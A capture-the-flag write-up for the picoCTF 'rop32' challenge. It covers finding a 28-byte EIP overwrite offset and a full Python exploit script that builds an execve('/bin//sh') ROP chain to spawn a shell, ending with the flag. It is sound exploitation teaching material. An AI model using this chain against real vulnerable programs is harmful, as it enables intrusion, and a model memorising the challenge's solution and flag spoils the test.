rop32
Binary Exploitation - Points: 400
Can you exploit the following program to get a flag?
Use ROPgadget to find a ROP chain that spawns a shell. The `--badbytes "0a"` option excludes any gadget whose address contains a newline byte, which would otherwise cut the input short:
$ ROPgadget --binary vuln --ropchain --badbytes "0a"
Find the offset at which the overflowing buffer reaches the saved return address (this is a 32-bit binary, so the register overwritten is EIP, not RIP). Create a cyclic pattern, feed it to the program under gdb, and read the value in EIP when the SEGFAULT occurs; that value is the slice of the pattern that landed on the return address.
$ /opt/metasploit/tools/exploit/pattern_create.rb --length 1024
$ /opt/metasploit/tools/exploit/pattern_offset.rb -q 0x62413961
[*] Exact match at offset 28
Prefix the ROP chain from ROPgadget with 28 bytes of padding and send it to the program. The `cat` in the pipeline below keeps stdin open after the payload, so the spawned shell still reads commands and lets you `cat flag.txt`.
$ (python2 sol.py; cat) | ./vuln
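The writeup does not show sol.py. The following is an added example, not the original script or ROPgadget's output: it re-implements the pattern_create/pattern_offset step in Python 3 (so the offset 28 can be reproduced without Metasploit) and assembles the `execve("/bin//sh", NULL, NULL)` chain in the same layout that `ROPgadget --ropchain` prints for a 32-bit static binary. The gadget and `.data` addresses in `GADGETS` are hypothetical placeholders and must be replaced with the ones ROPgadget reports for `vuln`.

```python
import struct
import string

# Added example, not the writeup's sol.py. Python 3; run with
#   (python3 sol.py; cat) | ./vuln

def p32(value):
    """Pack a 32-bit value little-endian, as x86 reads it off the stack."""
    return struct.pack("<I", value)

def pattern_create(length):
    """Same cyclic sequence as Metasploit's pattern_create.rb
    (Aa0Aa1...Aa9Ab0...), truncated to `length` bytes."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length].encode()
    return "".join(chunks)[:length].encode()

def pattern_offset(eip_value, length=1024):
    """Equivalent of pattern_offset.rb -q <hex>: the value found in EIP at the
    crash is four consecutive pattern bytes read little-endian, so pack it the
    same way and search. Returns -1 if the value is not from the pattern."""
    return pattern_create(length).find(p32(eip_value))

# Hypothetical addresses (assumption): they only illustrate the chain layout.
# Take the real ones from `ROPgadget --binary vuln --ropchain --badbytes "0a"`.
GADGETS = {
    "pop_edx":     0x0806ee6b,  # pop edx ; ret
    "pop_eax":     0x080b8016,  # pop eax ; ret
    "mov_edx_eax": 0x080556c0,  # mov dword ptr [edx], eax ; ret
    "xor_eax":     0x08049303,  # xor eax, eax ; ret
    "inc_eax":     0x0807a66f,  # inc eax ; ret
    "pop_ebx":     0x080481c9,  # pop ebx ; ret
    "pop_ecx":     0x080de769,  # pop ecx ; ret
    "int_0x80":    0x08049563,  # int 0x80
    "data":        0x080ea060,  # writable .data word used as scratch space
}

def build_chain(g=GADGETS):
    """execve("/bin//sh", NULL, NULL) through int 0x80 on 32-bit Linux."""
    data = g["data"]
    chain = b""
    # Write "/bin//sh" into .data four bytes at a time: destination into edx,
    # the four characters into eax, then store with mov [edx], eax.
    for off, word in ((0, b"/bin"), (4, b"//sh")):
        chain += p32(g["pop_edx"]) + p32(data + off)
        chain += p32(g["pop_eax"]) + word
        chain += p32(g["mov_edx_eax"])
    # NUL-terminate the string: store eax = 0 at .data + 8.
    chain += p32(g["pop_edx"]) + p32(data + 8)
    chain += p32(g["xor_eax"])
    chain += p32(g["mov_edx_eax"])
    # Syscall arguments: ebx = filename, ecx = argv (NULL), edx = envp (NULL).
    # .data + 8 now holds a zero word, so it doubles as the NULL pointer.
    chain += p32(g["pop_ebx"]) + p32(data)
    chain += p32(g["pop_ecx"]) + p32(data + 8)
    chain += p32(g["pop_edx"]) + p32(data + 8)
    # eax = 11 (__NR_execve) via xor + 11 increments; popping 0x0000000b
    # directly would place NUL bytes in the payload.
    chain += p32(g["xor_eax"])
    chain += p32(g["inc_eax"]) * 11
    chain += p32(g["int_0x80"])
    return chain

def build_payload(offset, chain, bad_bytes=b"\n"):
    """Padding up to the saved EIP followed by the chain. Refuses any byte
    the input path would break on (0x0a here, matching --badbytes "0a")."""
    payload = b"A" * offset + chain
    found = [b for b in bad_bytes if b in payload]
    if found:
        raise ValueError("payload contains bad byte(s): %r" % found)
    return payload

if __name__ == "__main__":
    import sys
    offset = pattern_offset(0x62413961)  # the EIP value seen in gdb -> 28
    sys.stdout.buffer.write(build_payload(offset, build_chain()) + b"\n")
```

The trailing newline written by the script is what terminates the program's line read; it sits after the chain, so it never lands inside an address. If ROPgadget reports a different gadget for any step (for example `mov dword ptr [ecx], eax` instead of `[edx]`), adjust the corresponding register pops rather than the overall order, which is dictated by the `int 0x80` calling convention.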
flag: picoCTF{rOp_t0_b1n_sH_01a585a7}